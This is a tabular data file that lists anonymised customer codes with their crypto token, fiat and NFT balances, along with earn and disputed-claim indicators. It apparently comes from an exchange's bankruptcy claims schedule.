| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363818 | | CUSDT[1], DOGE[.36699623], USD[0.37] | | |
| 07363819 | | USD[10.00] | | |
| 07363820 | | CUSDT[3], USD[16.92] | | |
| 07363821 | | CUSDT[1], SOL[1.54532995], SUSHI[.97823651], TRX[2], USD[0.00], USDT[0] | | |
| 07363822 | | USD[10.00] | | |
| 07363823 | | BRZ[1], BTC[0], CUSDT[3], DOGE[.00001935], TRX[2], USD[0.01] | | |
| 07363824 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], UNI[0], USD[0.00] | | |
| 07363825 | | BRZ[1], USD[0.01] | | |
| 07363826 | | CUSDT[1], DOGE[21889.93417486], USD[0.00] | | |
| 07363827 | | BRZ[1], CUSDT[2], LTC[1.52252546], TRX[1], USD[0.00] | | |
| 07363828 | | TRX[1], USD[0.00] | | |
| 07363829 | | USD[10.00] | | |
| 07363830 | | USD[2.26] | | |
| 07363831 | | USD[10.00] | | |
| 07363832 | | USD[10.00] | | |
| 07363833 | | CUSDT[3], DOGE[1], TRX[1], USD[0.00] | | |
| 07363834 | | USD[10.00] | | |
| 07363835 | | CUSDT[2], USD[0.06] | | |
| 07363836 | | USD[10.00] | | |
| 07363837 | | DOGE[198.57443413], USD[0.00] | | |
| 07363838 | | USD[10.00] | | |
| 07363839 | | BRZ[1], DOGE[.00004623], TRX[2], USD[0.01] | | |
| 07363840 | | BRZ[1], CUSDT[1], DOGE[7], USD[0.01] | | |
| 07363841 | | USD[10.00] | | |
| 07363842 | | USD[10.00] | | |
| 07363843 | | USD[10.00] | | |
| 07363845 | | BRZ[1351.084717866], CUSDT[2], TRX[1994.18290334], USD[0.00] | | |
| 07363846 | | ETHW[.00070922], GRT[.81807], SOL[0.01300269], UNI[.0671375], USD[0.00], USDT[0] | | |
| 07363850 | | BAT[7.07243611], BRZ[2], BTC[0.00529192], CUSDT[7], ETH[0.15262155], ETHW[0.15185288], KSHIB[0], MATIC[41.26519994], SHIB[1], SOL[1.40156607], TRX[1], USD[0.38], USDT[1.10502912] | Yes | |
| 07363852 | | CUSDT[1], DOGE[1165.60736507], USD[363.16] | Yes | |
| 07363853 | | USD[10.00] | | |
| 07363854 | | CUSDT[2], USD[0.00] | | |
| 07363856 | | CUSDT[3], DOGE[2308.77767897], TRX[1.01022515], USD[12.88] | Yes | |
| 07363857 | | CUSDT[5], DOGE[.00007725], TRX[1], USD[0.01] | | |
| 07363858 | | BTC[0], SOL[0.41757191], SUSHI[.00000001], USD[0.34] | | |
| 07363859 | | USD[10.00] | | |
| 07363860 | | USD[10.00] | | |
| 07363861 | | DOGE[3], GRT[13.35476645], LINK[.2047907], SHIB[1], TRX[1], USD[0.01], USDT[0.00001605] | | |
| 07363862 | | GRT[4.64749412], USD[0.00] | | |
| 07363863 | | ETHW[10.112], USD[0.00], USDT[0] | | |
| 07363864 | | USD[10.00] | | |
| 07363865 | | ETH[.12845998], ETHW[.12845998], USD[10.00] | | |
| 07363866 | | USD[10.00] | | |
| 07363867 | | DOGE[.00002677], TRX[1], USD[0.00] | | |
| 07363868 | | USD[10.00] | | |
| 07363869 | | USD[10.00] | | |
| 07363870 | | BTC[.00021542], USD[0.00] | | |
| 07363873 | | CUSDT[2], DOGE[99.99998734], USD[0.00] | | |
| 07363874 | | USD[10.08] | | |
| 07363875 | | USD[10.00] | | |
| 07363876 | | USD[10.00] | | |
| 07363877 | | BTC[.00003979], DOGE[7], ETH[.00000566], ETHW[0.00000566], NFT [490169438369519204/Abstraction No.3927][1], SOL[0], USD[19046.57], USDT[0] | | |
| 07363878 | | BRZ[2], CUSDT[3], DOGE[229.24433354], TRX[1], USD[0.29] | | |
| 07363879 | | DOGE[0], ETH[0], SHIB[0], USD[0.00] | Yes | |
| 07363880 | | USD[10.00] | | |
| 07363881 | | USD[10.00] | | |
| 07363883 | | SUSHI[.47529294], TRX[8.8577405], USD[0.18] | | |
| 07363885 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363888 | | USD[0.00] | | |
| 07363889 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07363891 | | BTC[0], USD[0.00], USDT[0] | Yes | |
| 07363892 | | USD[10.00] | | |
| 07363893 | | USD[10.00] | | |
| 07363894 | | TRX[1], USD[9.57] | | |
| 07363896 | | USD[10.00] | | |
| 07363897 | | USD[0.00] | Yes | |
| 07363898 | | USD[10.00] | | |
| 07363899 | | BRZ[3], CUSDT[6], DOGE[2], GRT[2.00498957], SHIB[1], TRX[9], USD[0.00], USDT[0] | Yes | |
| 07363902 | | USD[10.00] | | |
| 07363903 | | CUSDT[1], DOGE[1192.81495899], MATIC[29.60353031], TRX[885.70574989], USD[21.01] | Yes | |
| 07363904 | | USD[10.00] | | |
| 07363905 | | USD[10.00] | | |
| 07363906 | | USD[10.00] | | |
| 07363907 | | DOGE[3.34548776], USD[0.06] | | |
| 07363908 | | DOGE[0], ETH[0], MATIC[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07363909 | | BTC[0.00024032], CUSDT[4], DOGE[2], PAXG[.00518393], TRX[2], USD[0.00] | | |
| 07363910 | | DOGE[.00001977], TRX[1], USD[0.00] | | |
| 07363911 | | CUSDT[7], DOGE[0], ETH[0.09516461], ETHW[0.09412662], TRX[1], USD[0.32] | Yes | |
| 07363912 | | USD[10.00] | | |
| 07363913 | | USD[0.00] | | |
| 07363914 | | BAT[1], BRZ[1], USD[0.77] | | |
| 07363915 | | DOGE[147.95571803], USD[0.00] | | |
| 07363919 | | GRT[1.00498957], USD[0.00] | Yes | |
| 07363920 | | USD[0.00] | | |
| 07363921 | | BRZ[0], LINK[.00053068], USD[0.27], USDT[0] | Yes | |
| 07363922 | | USD[19.13] | | |
| 07363923 | | BTC[.00053384], CUSDT[4], DOGE[2240.52278166], SHIB[6584005.49699804], USD[0.00] | Yes | |
| 07363924 | | CUSDT[1], DOGE[.0001188], TRX[1], USD[0.00] | | |
| 07363925 | | CUSDT[2], DOGE[183.55722147], ETH[0], ETHW[0], USD[0.00] | | |
| 07363926 | | USD[0.11] | | |
| 07363927 | | USD[0.00] | | |
| 07363928 | | BCH[.01137923], BTC[.00027008], CUSDT[3], DOGE[1.36563022], TRX[580.80568208], USD[0.01] | | |
| 07363929 | | SOL[1.03778591], USD[0.00] | | |
| 07363930 | Contingent, Disputed | DOGE[11269.71664631], GRT[1.00313735], USD[0.00], USDT[0] | Yes | |
| 07363931 | | DOGE[0], SGD[0.00], USD[0.00] | | |
| 07363933 | | DOGE[138.84602018], USD[0.00] | | |
| 07363934 | | BTC[0], ETH[0.00000002], ETHW[0], SOL[0], TRX[.000003], USD[0.00], USDT[0] | | |
| 07363935 | | USD[10.00] | | |
| 07363936 | | USD[0.00] | | |
| 07363937 | | CUSDT[1], DOGE[2368.49569461], KSHIB[305.27350827], USD[0.00] | Yes | |
| 07363938 | | USD[10.00] | | |
| 07363939 | | BRZ[1], CUSDT[3], DOGE[0.00900784], ETH[.01571739], ETHW[.01552587], GRT[67.72339485], KSHIB[1807.86182152], NFT [334582744043204630/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #38][1], NFT [405497883057388178/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #56][1], NFT [416310871685935667/Sigma Shark #7155][1], NFT [457321718687032620/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #37][1], NFT [473091256702391390/Space Bums #2752][1], NFT [532875123030571086/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #37][1], SHIB[2082775.01748089], SOL[.50358394], USD[112.80] | Yes | |
| 07363940 | | USD[10.00] | | |
| 07363941 | | BTC[0], ETH[0], NEAR[.00000001], USD[0.00] | | |
| 07363942 | | TRX[1], USD[0.00] | | |
| 07363944 | | SHIB[704095.98574896], USD[0.00] | Yes | |
| 07363945 | | DOGE[1], TRX[2], USD[0.01] | | |
| 07363947 | | USD[10.00] | | |
| 07363948 | | USD[10.00] | | |
| 07363949 | | DOGE[273.85820911], USD[5.16] | | |
| 07363950 | | BRZ[1], DOGE[0], TRX[.00470855], USD[0.00] | Yes | |
| 07363951 | | LTC[.05427258], USD[0.00] | | |
| 07363952 | | USD[0.01] | Yes | |
| 07363953 | | BRZ[0], TRX[179.42539132], USD[282.19] | Yes | |
| 07363954 | | BRZ[0], CUSDT[3], DOGE[1282.63875735], SHIB[1], SOL[0], TRX[231.30275753], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363955 | | USD[10.00] | | |
| 07363956 | | BAT[13.35868152], USD[0.00] | | |
| 07363958 | | BRZ[2], CUSDT[1], TRX[3], USD[0.00], USDT[1] | | |
| 07363959 | | BAT[1], BRZ[2], BTC[.01086852], CUSDT[10], DOGE[210.43733298], ETH[.11431268], ETHW[.11431268], SHIB[2], SOL[1.65188329], TRX[4], USD[198.77], USDT[1] | | |
| 07363960 | | DOGE[359.70319437], ETH[0.18381332], ETHW[0.18357139], MATIC[2029.59976444], SHIB[1], SOL[16.70100263], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07363962 | | USD[10.00] | | |
| 07363963 | | BAT[1], BRZ[2], CUSDT[10], DOGE[4], TRX[2], USD[0.01] | Yes | |
| 07363964 | | BTC[.00350132], CUSDT[1483.89182127], DOGE[158.46483238], SHIB[1], TRX[212.65079326], USD[0.00] | Yes | |
| 07363965 | | USD[10.00] | | |
| 07363966 | | BAT[1], BRZ[2], CUSDT[1], DOGE[938.92515667], TRX[2], USD[1.00], USDT[0] | | |
| 07363967 | | CUSDT[1], DOGE[23.64774208], USD[0.00], USDT[0] | | |
| 07363968 | | DOGE[17.55921976], USD[0.00] | | |
| 07363969 | | USD[0.18] | Yes | |
| 07363970 | | USD[10.00] | | |
| 07363971 | | USD[0.38] | | |
| 07363972 | | ETH[0], LTC[0], USD[0.00], USDT[0] | | |
| 07363974 | | BTC[0], USD[0.64] | | |
| 07363976 | | USD[10.00] | | |
| 07363977 | | USD[10.00] | | |
| 07363978 | | USD[10.00] | | |
| 07363979 | | USD[10.00] | | |
| 07363980 | | BRZ[1], BTC[0], DOGE[1], USD[0.00], USDT[0] | | |
| 07363982 | | USD[0.00] | Yes | |
| 07363984 | | SOL[46.8214], USD[12.43] | | |
| 07363985 | | USD[10.00] | | |
| 07363986 | | USD[10.00] | | |
| 07363987 | | DOGE[138.81338937], USD[0.00] | | |
| 07363988 | | USD[10.00] | | |
| 07363990 | | DOGE[424.98009975], SHIB[1423284.94164531], USD[279.08], USDT[0] | | |
| 07363991 | | CUSDT[1], DOGE[501.21265428], USD[0.38] | | |
| 07363992 | | USD[10.00] | | |
| 07363993 | | CUSDT[.00065996], UNI[0], USD[0.00] | | |
| 07363994 | | AVAX[.01176472], BAT[1.01608237], BRZ[0.00000579], BTC[0], CUSDT[2], DOGE[4.00001033], ETH[0], ETHW[.86962138], GRT[2.00125141], LTC[0], MATIC[.2106594], NFT (289510599598063248/Barcelona Ticket Stub #1126)[1], NFT (329115254817882217/Thomas Jefferson Art #1)[1], NFT (336204419546197324/Imola Ticket Stub #782)[1], NFT (353408589708986147/Bitcoin Art #1)[1], NFT (388397242959253151/Keep your eye on the ball )[1], NFT (430612953802351388/Bitcoin Art #2)[1], NFT (496190503288701773/Bitcoin Art #3)[1], SHIB[5], SOL[44.82942078], TRX[8.00004954], USD[0.00], USDT[0] | Yes | |
| 07363995 | | CUSDT[1], ETH[.00569109], ETHW[.00569109], USD[0.00] | | |
| 07363996 | | CUSDT[3], DOGE[1], USD[0.00] | | |
| 07363998 | | USD[10.00] | | |
| 07363999 | | CUSDT[1], DOGE[.32047152], USD[6.13] | | |
| 07364000 | | USD[10.00] | | |
| 07364002 | | BTC[0], SOL[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07364003 | | SOL[.2684973], USD[0.00] | | |
| 07364004 | | DOGE[6200.41792353], LTC[0], SHIB[3], USD[0.01], USDT[0] | | |
| 07364005 | | USD[9.00] | | |
| 07364006 | | CUSDT[1], DOGE[20632.17917626], ETH[.00348196], ETHW[.00344092], TRX[1], USD[0.00] | Yes | |
| 07364007 | | CUSDT[2], USD[0.00] | | |
| 07364008 | | CUSDT[3], DOGE[67.64424801], USD[0.49] | | |
| 07364009 | | USD[0.00] | | |
| 07364010 | | TRX[.732] | | |
| 07364011 | | ETH[.00591677], ETHW[.00591677], USD[0.00] | | |
| 07364013 | | USD[10.00] | | |
| 07364014 | | USD[10.00] | | |
| 07364016 | | USD[10.00] | | |
| 07364017 | | USD[0.01] | | |
| 07364018 | | BTC[.00133034], CUSDT[3], DOGE[1459.02771035], LINK[7.59726153], SHIB[1417858.44110446], TRX[1078.90290617], USD[0.00] | Yes | |
| 07364019 | | USD[10.00] | | |
| 07364020 | | BRZ[2], CUSDT[5], DOGE[0], ETH[0], NFT (361559451387383302/Entrance Voucher #2606)[1], SHIB[6], TRX[2], USD[151.51] | | |
| 07364022 | | BRZ[1], DOGE[4.05213569], ETH[0], GRT[0], TRX[0], USD[0.01] | Yes | |
| 07364023 | | DOGE[1], GRT[8.03275968], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364024 | | USD[10.00] | | |
| 07364025 | Contingent, Disputed | BTC[.00173403], CUSDT[2], ETH[.02879775], ETHW[.02879775], TRX[213.6882833], USD[0.00] | | |
| 07364026 | | USD[10.00] | | |
| 07364027 | | BF_POINT[200], BTC[.00124365], ETH[5.67331166], ETHW[5.67092887], USD[0.00] | Yes | |
| 07364028 | | USD[10.00] | | |
| 07364029 | | USD[10.00] | | |
| 07364030 | | USD[10.00] | | |
| 07364031 | | USD[10.00] | | |
| 07364032 | | BRZ[1], DOGE[1], USD[0.88] | | |
| 07364033 | | USD[0.01] | | |
| 07364035 | | CUSDT[1], USD[0.00] | | |
| 07364036 | | DOGE[147.94110831], USD[1.25] | Yes | |
| 07364037 | | USD[10.00] | | |
| 07364039 | | USD[10.00] | | |
| 07364040 | | CUSDT[2], DOGE[0], ETH[0], GRT[0.00002645], LINK[0], LTC[0], SOL[0.93115500], SUSHI[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07364041 | | GRT[210.336], LINK[39.96], LTC[4.488], SOL[55.776], SUSHI[357.8655], USD[1828.19] | | |
| 07364042 | | USD[10.00] | | |
| 07364044 | | USD[10.00] | | |
| 07364045 | | DOGE[.00002184], TRX[3], USD[0.88] | | |
| 07364047 | | CUSDT[2], DOGE[50.39820311], USD[0.00] | Yes | |
| 07364048 | | USD[0.00] | Yes | |
| 07364049 | | USD[20.00] | | |
| 07364051 | | BAT[18.11179245], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07364052 | | USD[10.00] | | |
| 07364053 | | USD[0.00] | | |
| 07364055 | | USD[10.00] | | |
| 07364057 | | DOGE[134.17604652], USD[0.00], USDT[0.00006151] | | |
| 07364058 | | USD[10.00] | | |
| 07364059 | | USD[10.00] | | |
| 07364060 | | DOGE[122.87699275], USD[0.00] | | |
| 07364061 | | USD[10.00] | | |
| 07364062 | | USD[0.01] | | |
| 07364063 | | AAVE[0], BAT[0], BCH[0], BRZ[1], BTC[.00000112], CUSDT[0], DOGE[56543.08115823], ETH[0], ETHW[0], GRT[1], LTC[0], SHIB[30177905.20217647], SOL[0], SUSHI[0], TRX[2], USD[0.09], USDT[0] | Yes | |
| 07364064 | | CUSDT[1], DOGE[2961.59772194], USD[0.00] | Yes | |
| 07364065 | | USD[10.00] | | |
| 07364067 | | SHIB[1], TRX[1], USD[7782.01], USDT[0] | Yes | |
| 07364068 | | BTC[.00008078], DOGE[1], USD[0.00] | | |
| 07364069 | | BTC[0], DOGE[0], ETH[0], ETHW[0.00035775], SOL[0.00044568], USD[0.00], YFI[0] | | |
| 07364070 | | USD[10.00] | | |
| 07364072 | | USD[0.00] | | |
| 07364073 | | BRZ[1], CUSDT[7], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07364074 | | ETH[0], SOL[1.06979], TRX[.004011], USD[1.03] | | |
| 07364076 | Contingent, Disputed | DOGE[134.89904357], USD[0.00] | | |
| 07364077 | | USD[10.00] | | |
| 07364078 | | BTC[.00000003], CUSDT[0], ETH[0], MATIC[0], NFT (415481058575241115/Imola Ticket Stub #1021)[1], NFT (423735745515548644/Barcelona Ticket Stub #2486)[1], SHIB[500278.65286882], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07364080 | | SOL[0.00864315], USD[0.01] | | |
| 07364081 | | USD[10.00] | | |
| 07364083 | | USD[10.00] | | |
| 07364084 | | BAT[3.12273021], BRZ[4.00000015], BTC[0], CUSDT[4], DOGE[4], ETH[.00000001], GRT[4.03676514], SOL[0], TRX[10.00058632], USD[0.00], USDT[0] | Yes | |
| 07364085 | | USD[10.00] | | |
| 07364086 | | BRZ[1], CUSDT[6], DOGE[0], SOL[0], USD[0.00], USDT[0.00003241] | Yes | |
| 07364087 | | USD[10.00] | | |
| 07364088 | | USD[0.00] | | |
| 07364090 | | BAT[1], USD[0.38] | Yes | |
| 07364091 | | CUSDT[1], LTC[0], TRX[2314.88091929], USD[0.00] | | |
| 07364093 | | USD[10.00] | | |
| 07364095 | | DOGE[25.22601754], USD[0.00] | | |
| 07364096 | | SHIB[1], USD[10.64], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364097 | | DOGE[583.32830972], ETH[0], ETHW[0], SUSHI[0], USD[0.00] | Yes | |
| 07364098 | | BRZ[1], CUSDT[5], KSHIB[2025.82559011], TRX[1], USD[0.00] | Yes | |
| 07364099 | | ALGO[754.96161522], BRZ[0], DOGE[30000.80095042], ETH[1.04666243], ETHW[1.04622273], GRT[1337.70562417], SHIB[71656467.35283292], SOL[12.73609999], USD[0.00] | Yes | |
| 07364101 | | CUSDT[11], DOGE[1], ETH[0], SOL[0], TRX[2], USD[2.52], USDT[0.00009945] | | |
| 07364102 | | USD[10.00] | | |
| 07364103 | | BTC[0], CUSDT[20], DOGE[0], SUSHI[0], TRX[7], USD[0.00], USDT[1] | | |
| 07364104 | | GRT[.73927398], KSHIB[7.60364915], SHIB[6636.97201883], USD[0.00], USDT[0] | | |
| 07364105 | | DOGE[29.01390302], USD[0.00] | | |
| 07364106 | | USD[10.00] | | |
| 07364107 | | USD[10.00] | | |
| 07364108 | | USD[10.00] | | |
| 07364109 | | USD[10.00] | | |
| 07364110 | | DOGE[5711.51162477], USD[0.00] | Yes | |
| 07364111 | | USD[10.00] | | |
| 07364112 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07364113 | | USD[10.00] | | |
| 07364114 | | USD[10.00] | | |
| 07364115 | | ETH[.014], ETHW[.014], USD[0.43] | | |
| 07364116 | | CUSDT[1], TRX[3], USD[0.75], USDT[0] | | |
| 07364117 | | ETH[.0054061], ETHW[.0054061], USD[0.00] | | |
| 07364118 | | USD[10.00] | | |
| 07364121 | | USD[0.00] | | |
| 07364123 | | BRZ[1], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07364124 | | BRZ[0.00000080], CUSDT[3], DAI[0], SUSHI[0], USD[0.00] | | |
| 07364125 | | USD[10.00] | | |
| 07364126 | | BRZ[1], DOGE[199.74877822], USD[0.00] | | |
| 07364127 | | USD[10.00] | | |
| 07364128 | | USD[10.00] | | |
| 07364129 | | NFT (340348360455322224/Humpty Dumpty #186)[1], NFT (489677775324193334/FTX Crypto Cup 2022 Key #2412)[1], NFT (536904601575040413/The Hill by FTX #8471)[1], USD[0.00] | Yes | |
| 07364131 | | USD[10.00] | | |
| 07364132 | | USD[10.00] | | |
| 07364133 | | CUSDT[7], DOGE[230.13089639], ETH[.02519659], ETHW[.02519659], LTC[.02575698], SOL[1.71174241], SUSHI[1.15927216], UNI[.49652815], USD[20.00] | | |
| 07364134 | | USD[10.00] | | |
| 07364135 | | CUSDT[1], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07364136 | | BAT[18.82042022], DOGE[0], GRT[0], SHIB[721765.66605233], USD[0.00] | | |
| 07364137 | | DOGE[0], USD[0.00] | | |
| 07364138 | | USD[10.00] | | |
| 07364139 | | AAVE[0.01414866], BAT[102.80047318], BRZ[1], CUSDT[45.00246581], DOGE[175.81334703], GRT[2.06354537], NFT (404652969797042649/Corvette and corvettes )[1], NFT (530036258636469665/Roarnald Reagan)[1], NFT (543180279604967898/Texas Memorial Stadium)[1], SOL[0], TRX[346.37074974], USD[3.80], USDT[0.00000211] | Yes | |
| 07364141 | | BAT[1], DOGE[3116.698081], NFT (571124112353565160/Coachella x FTX Weekend 2 #100)[1], USD[0.00] | | |
| 07364145 | | BRZ[1], CUSDT[5], USD[0.01] | Yes | |
| 07364147 | | USD[10.00] | | |
| 07364148 | | BTC[.00000026], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0.00012513] | Yes | |
| 07364149 | | USD[0.00] | Yes | |
| 07364150 | | BF_POINT[300], BTC[0], DOGE[3], ETHW[2.99890695], TRX[2], USD[0.00] | Yes | |
| 07364151 | | CUSDT[1], DOGE[427.09757021], TRX[2], USD[0.00] | | |
| 07364152 | | USD[10.00] | | |
| 07364153 | | USD[10.00] | | |
| 07364154 | | BAT[8.41374533], CUSDT[1], DOGE[300.41140556], PAXG[.00581161], SOL[2.08813112], TRX[320.69818134], USD[0.50], USDT[2.19273732] | Yes | |
| 07364155 | | LTC[0], SUSHI[0], USD[0.00] | | |
| 07364156 | | USD[10.00] | | |
| 07364157 | | CUSDT[1], DOGE[79.21644071], USD[38.95] | | |
| 07364158 | | SUSHI[.3105], UNI[.014], USD[0.53] | | |
| 07364159 | | CUSDT[1], DAI[0], DOGE[1], LINK[0.00001453], USD[0.00] | | |
| 07364160 | | CUSDT[1], DOGE[9462.20306086], TRX[67.6269239], USD[0.00] | | |
| 07364161 | | BTC[0], USD[0.33], USDT[6] | | |
| 07364162 | | USD[2.20] | | |
| 07364163 | | USD[10.00] | | |
| 07364164 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364165 | | USD[10.00] | | |
| 07364166 | | BTC[0], DOGE[1], ETH[0], USD[0.00] | | |
| 07364167 | | BAT[3.05890555], BRZ[2], BTC[.00916663], CUSDT[10], DAI[10.94169085], DOGE[7593.47418574], ETH[.06127055], ETHW[.06050926], GRT[.00000317], TRX[10.00087675], USD[0.01], USDT[12.08413558] | Yes | |
| 07364168 | | USD[10.00] | | |
| 07364170 | | USD[10.00] | | |
| 07364171 | | USD[0.00], USDT[9.94606151] | | |
| 07364172 | | DOGE[16.58050985], USD[0.00] | | |
| 07364174 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07364175 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07364176 | | BRZ[1], CUSDT[2], USD[0.01] | | |
| 07364177 | | CUSDT[1], DOGE[3], TRX[1], USD[0.00] | | |
| 07364178 | | BTC[0], ETHW[.00078003], USD[0.01] | | |
| 07364179 | | BAT[7.69265402], BRZ[5.07952967], BTC[0], CUSDT[4], DOGE[15.07570278], ETH[0], GRT[9.70037797], LINK[1.09895055], MATIC[0], SHIB[1], SOL[0], SUSHI[0], TRX[14.46603686], USD[0.00], USDT[1.02543223], YFI[0] | Yes | |
| 07364182 | | USD[10.00] | | |
| 07364183 | | CUSDT[1], DOGE[1], ETH[.00000001], USD[0.00] | Yes | |
| 07364186 | | BRZ[2], CUSDT[8], DOGE[0], ETH[0], TRX[5], USD[0.01] | | |
| 07364187 | | USD[10.00] | | |
| 07364188 | | DOGE[1], USD[0.00] | | |
| 07364189 | | SHIB[1], USD[0.00] | Yes | |
| 07364191 | | BTC[0.10746568], ETH[.000486], ETHW[.000486], GRT[0], SUSHI[0], UNI[0], USD[0.34] | | |
| 07364192 | | USD[0.00] | | |
| 07364195 | | USD[10.00] | | |
| 07364196 | | USD[0.01] | | |
| 07364197 | | BRZ[9.78606396], CUSDT[21], DOGE[2], GRT[1], MATIC[.00079668], SHIB[3], TRX[1], USD[0.03], USDT[2.17468094] | Yes | |
| 07364198 | | USD[10.00] | | |
| 07364199 | | NFT (419722201133902769/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #16)[1], NFT (421737548384421463/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #17)[1], NFT (432511970375893761/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #15)[1], NFT (512989984501012241/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #15)[1], NFT (540113479918366571/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #12)[1], NFT (566767366907385807/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #14)[1], USD[0.00], USDT[0] | | |
| 07364201 | | USD[10.00] | | |
| 07364202 | | BAT[2.25384842], BRZ[1], BTC[.00000007], CUSDT[1], DOGE[6.48823057], ETH[.00011276], ETHW[.00011276], LTC[.01322945], USD[1.84] | | |
| 07364203 | | BF_POINT[100], BRZ[1], DOGE[7.00057537], ETH[0], ETHW[0.00000582], MATIC[121.05575405], SHIB[31], SOL[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07364204 | | BRZ[1], CUSDT[3], DOGE[585.78231183], TRX[2], USD[0.00] | | |
| 07364205 | | BTC[.00013766], USD[0.00] | | |
| 07364206 | | USD[10.00] | | |
| 07364207 | | USD[10.00] | | |
| 07364208 | | CUSDT[5], DOGE[199.53614064], USD[0.00] | Yes | |
| 07364209 | | USD[10.00] | | |
| 07364210 | | CUSDT[2], SOL[0], USD[58.01] | Yes | |
| 07364211 | | BTC[.00042922], DOGE[2], USD[0.00], USDT[0] | | |
| 07364212 | | USD[10.00] | | |
| 07364213 | | USD[10.00] | | |
| 07364214 | | DOGE[3663.83704755], USD[11.10] | Yes | |
| 07364216 | | TRX[1129.89392202], USD[0.00] | | |
| 07364217 | | USD[0.00] | | |
| 07364218 | | NFT (410116175337117736/Coachella x FTX Weekend 2 #28710)[1], NFT (522889046149466969/Coachella x FTX Weekend 1 #28660)[1] | | |
| 07364219 | | CUSDT[1], DOGE[100.0000466], USD[0.07] | | |
| 07364221 | | USD[10.00] | | |
| 07364222 | | BTC[0], SOL[0], USD[0.01], USDT[0.00000003] | | |
| 07364223 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07364224 | | BAT[1], BRZ[1], CUSDT[1], DOGE[621.74328814], USD[0.00] | | |
| 07364225 | | BRZ[1], CUSDT[1], DOGE[.00002537], TRX[2], USD[0.01] | | |
| 07364227 | | GRT[4.56447072], USD[0.00] | Yes | |
| 07364228 | | DOGE[.999], GRT[103.53686436], USD[0.00] | | |
| 07364230 | | TRX[76.27743378], USD[0.00] | Yes | |
| 07364231 | | USD[10.00] | | |
| 07364232 | | USD[10.00] | | |
| 07364233 | | USD[0.00] | Yes | |
| 07364234 | | BTC[.01746911], ETH[.00901925], ETHW[.00890973], SHIB[1], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07364235 | | BTC[0.01342556], ETH[0.13443723], ETHW[0.11001986], LTC[.78939559], SHIB[5701778.18209514], SOL[1.57088317], TRX[2], USD[0.78] | Yes | |
| 07364236 | | USD[0.00] | | |
| 07364237 | | USD[10.00] | | |
| 07364238 | | CUSDT[1], DOGE[10.63816274], GRT[0], TRX[2], USD[0.00] | Yes | |
| 07364239 | | USD[10.00] | | |
| 07364240 | | AAVE[0], AUD[0.00], BAT[520.64289032], BRZ[2002.47266722], BTC[0], CUSDT[0], DAI[.04111403], DOGE[18283.48492209], ETH[0], ETHW[0], GRT[706.69121494], LINK[34.42415456], LTC[1.88834502], MATIC[243.48069681], SOL[9.99996011], SUSHI[76.98921953], TRX[7499.49761326], UNI[41.95413032], USD[0.01], USDT[0.00016624], YFI[0.00375802] | | |
| 07364241 | | USD[10.00] | | |
| 07364243 | | USD[10.00] | | |
| 07364244 | | USD[10.00] | | |
| 07364245 | | USD[10.00] | | |
| 07364246 | | CUSDT[1], TRX[1.000001], USD[0.00] | | |
| 07364247 | | USD[10.00] | | |
| 07364248 | | USD[10.00] | | |
| 07364249 | | SUSHI[.00003257], TRX[2], USD[0.00] | | |
| 07364250 | | USD[10.00] | | |
| 07364251 | | BTC[.00017727], CUSDT[1], DOGE[1202.05339051], USD[0.00] | | |
| 07364252 | | BTC[.0016955], USD[311459.37] | | |
| 07364254 | | CUSDT[4], DOGE[0], TRX[1], USD[0.00] | | |
| 07364255 | | SHIB[500142.02799303], USD[0.02] | | |
| 07364256 | | USD[10.00] | | |
| 07364257 | | DOGE[171.10899848], USD[0.00] | | |
